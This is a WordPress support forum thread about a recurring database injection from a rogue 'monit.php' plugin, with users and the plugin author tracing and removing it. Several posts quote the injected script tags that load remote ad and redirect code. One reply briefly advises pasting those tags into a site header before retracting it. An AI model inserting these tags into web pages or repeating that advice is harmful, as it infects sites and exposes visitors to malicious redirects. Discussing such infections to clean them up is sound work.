Support » Plugin: Anti-Malware Security and Brute-Force Firewall » DB Injection appears again and again…

  • Resolved theone211

    (@theone211)


    Hello,
    First, thanks for this perfect plugin, it helped me a lot and solved many problems with Malware and DB injections.

    My troubles began like this: Redirecting from my site when someone click on picture, menu or anywhere. When I’m logged in as an admin, it doesn’t redirect. That’s why I didn’t notice the problem.
    2 days ago
    – Adwords disabled all ads (Malware detected)
    – Sucuri scaning critical warning “?Rogueads – Malware”, infected file I think was „404javascript file“, I dont remember exact name. I could not found it anywhere on server to delete it.

    Cleaning:
    PHASE 1. Wordfence – Found “Rogueads – Malware issue” – DELETED – After cleaning Sucuri Rogueads Malware appeared again.
    PHASE 2. after that I checked with your plugin and found this:
    cache/…/3rd-party dir found „pushsar.com-pfe-current-tag.min“ – deleted
    plugins/root dir found „monit.php“ (Monitization plugin) – deleted
    „admin_ips.txt“ write all my admin ip addresses – deleted
    DB Injections: NtBiZLQDoptions:361339:”ad_code” <script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script> – DELETED
    after all this NO Warning Sucuri 🙂

    BUT on new scan:
    PHASE 1. Wordfance does not detect anything.
    PHASE 2. with your plugin AGAIN detect ONLY DB Injections: NtBiZLQDoptions:361339:”ad_code” <script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script> – DELETED
    „admin_ips.txt“ file is also created AGAIN – I don’t know if it’s normal for this file to be created at all.

    I’m losing my nerve with this malware.

    Thank you in advance 🙂

    • This topic was modified 2 months, 1 week ago by theone211.
    • This topic was modified 2 months, 1 week ago by theone211.
Viewing 15 replies - 1 through 15 (of 41 total)
  • Plugin Author Eli

    (@scheeeli)

    I think that there must be something left on your server that is being overlooked, some malicious script hiding somewhere that has not yet been found. It might be that this malicious script is not even hiding on the site that keeps getting infected, it could be coming in from another site on the same server.

    Your biggest clue is that admin_ips.txt file, what directory is that file in? The script that is writing that file might be in that same directory. Also, when that file is created, but before you make any changes to it, there will be some timestamps on the file that you can read with the “stat” command. Then you can cross-reference the modified timestamp with the entries in access_log files on your server. This may give you a clue as to what script is writing to that file.

    You should also check the functions.php file in your theme and look for any new plugin files. These might contain new code that uses the “wp_footer” or some other WordPress hook to load a malicious function that will write all those malicious script tags to your DB.

    Please send me anything you find that might help me identify this new threat and I will add it to my definition updates so that it can be automatically and completely removed in future scans.

    eli AT gotmls DOT net

    Hello, I have the same problem.
    Wordfence and Anti-Malware from GOTMLS.NET not detect the malware. Only Sucuri detect the malware (<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3260072″ async data-cfasync=”false”></script>)

    I don’t know how fix it

    • This reply was modified 2 months, 1 week ago by fabso.

    Hi, i have the same problem….

    It keeps showing up in the database … has anyone managed to fix it?

    You tried to block write permissions from hosting.

    Then I will tell you if this works.

    Please if someone finds the solution, tell us how to do it.

    Hello i am also facing the same problem

    one of my website this script is showing in db wp option i am deleting but again is showing if anyone find the right solutions please pls tell us.

    Plugin Author Eli

    (@scheeeli)

    Hi everyone,
    Please read and follow the suggestions in my first reply before flooding this thread with “same”, “same”, “same”…

    If you want to find the source of this infection then follow these steps and report back to me with the results.

    I will be the one to add this to the definition updates and post the solution once someone sends me the source code for this new threat. I have had multiple reports of similar infections but nobody has bothered to follow the trail back to script that is generating these injections.

    Here are three things you can do to trace these infections back to the source of the malicious code:

    1. When you see the admin_ips.txt file, but before you make any changes to it (or delete it), stat the file to get the modified time. Then you can cross-reference the modified timestamp with the entries in the access_log files on your server. This may point you to the script that is responsible for writing that file.

    2. Use grep, or some equivalent text search command on your server, to locate any file that contains the text “admin_ips.txt”. if you are a coder and familiar with WordPress then you could also look for any “wp_footer” hook references and week out all the legitimate functions to find the misused function that has added this hook to inject this malicious code.

    3. You could try the core files definitions as there is some indication that this code might have been injected into WP Core Files.
    Please contact me directly if you would like more personalized support in tracking down the source of this infection:
    eli AT gotmls DOT net

    cassio22avelar

    (@cassio22avelar)

    SOLUTION
    Look in the plugins installation folder in wordpress for the file monit.php or type the name of your domain + /wp-admin/options-general.php?page=monit and see if a monitoring screen appears.
    The monit.php plugin he creates admin_ips is for detecting the admim ip and nothing appears in the admin browser.
    Delete the admin_ips and monit.php this solved my problem.

    He who generates this command.
    <script type = “text / javascript” src = “// ofgogoatan.com/apu.php?zoneid=3260072” async data-cfasync = “false”> </script>
    <script src = “https://pushsar.com/pfe/current/tag.min.js?z=3260077&#8221; data-cfasync = “false” async> </script>

    Plugin Author Eli

    (@scheeeli)

    Thanks for posting that solution. That will work when the file is called monit.php but hacker often change the names of the files they use or copy the same malicious code into other files to avoid detection. Is there any chance that you could send me the contents of that monit.php file so that I can add this threat to my definition update? then it can be automatically removed no matter what file it’s injected into 😉

    eli AT gotmls DOT net

    Plugin Author Eli

    (@scheeeli)

    Hi everyone,
    Big thanks to Floris for sending me the contents of this monit.php file. I have added this new threat to my definition update so it can now be automatically removed using my plugin. Please download the latest definition updates and run the complete scan to remove this threat 😉

    kristians4

    (@kristians4)

    Hi Eli, I ran the scan and it detected this threat! I quarantined it but Securi is still detecting it. Does it take time for Securi to update to not show the virus anymore? Or is there something wrong still?

    Plugin Author Eli

    (@scheeeli)

    Great, thanks for confirming that the new update works.

    Yes, Sucuri caches their scan results so you need to “Force a Re-scan” to see the updated scan results.

    send me a link to the results if there is anything else I should look at.

    GROVLY

    (@sahilkumargaba)

    Hello All,

    The virus you are talking about on this thread found on monit.php file. If you are using any cache plugin, just clear the cache after removing file but still it shows in securi because the scripts are also injected into database of options table.

    <script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3280383″ async data-cfasync=”false”></script>
    <script src=”https://propu.sh/pfe/current/tag.min.js?z=3280389&#8243; data-cfasync=”false” async></script>

    these two javascript are shown

    Plugin Author Eli

    (@scheeeli)

    @sahilkumargaba,
    Thanks you for posting this. While this additional info might be helpful to some, I feel it’s important to note that this topic has been marked resolved because my plugin can fully remove these DB injection you listed here, as well as the PHP code that was responsible for injecting these scripts into your database.

    Also, Sucuri has their own cache of their scan results so you still need to “Force a Re-scan” on the Sucuri page to see their updated scan results.

    I found embedding a monit plug-in script from installing the plug-in downloaded from a free download website.

    When installing the plug-in or the theme mentioned There will be a monit embedded in your website.

    The script checks and stores the IP address of the admin by choosing not to show advertisements to administrators. And those entering the website directly via the URL

    The script will only show ads to people searching for websites via search engines.

    The checking and fixing methods I found.

    1. Do not install plugins from 3rd party
    2. Check the URL by going to
    http: // ____ your URL ____ / wp-admin / options-general.php? page = monit
    If your website has scripts it will display this page.
    b8e44fe9b73b2bf9f003d0dcfd2b983e.jpg

    3. Go to the folder wp-content / plugins, admin_ips.txt and monit.php will be found.
    4. Delete messages within the file without deleting the file to prevent rewriting And set the permission is read only
    5. Insert this script in the header of the website to close the monit script.

    <script type = “text / javascript” src = “// ofgogoatan.com/apu.php?zoneid=3280383” async data-cfasync = “false”> </script>
    <script src = “https://propu.sh/pfe/current/tag.min.js?z=3280389&#8221; data-cfasync = “false” async> </script>

    Examples of files that I found to include scripts

    dc8b0c54f1deecec7f8423488c394b40.jpg

    7141b12507268596b391fc3845784d11.jpg

    Sorry, I misunderstood the above comment. Please remove the script in section 5 from the header.

    Greetings, I am afraid I have to re-open this again.
    So, I have the same monit malware issue. I’ve deleted the theme and all related plugin + downloaded latest definition updates.
    However, it seams the script is re-injection it self, even after Anti-Malware deletes it.
    It seems to be bigger than what we think it is.

    Screenshot:
    https://ibb.co/wY0Sd57

Viewing 15 replies - 1 through 15 (of 41 total)
  • The topic ‘DB Injection appears again and again…’ is closed to new replies.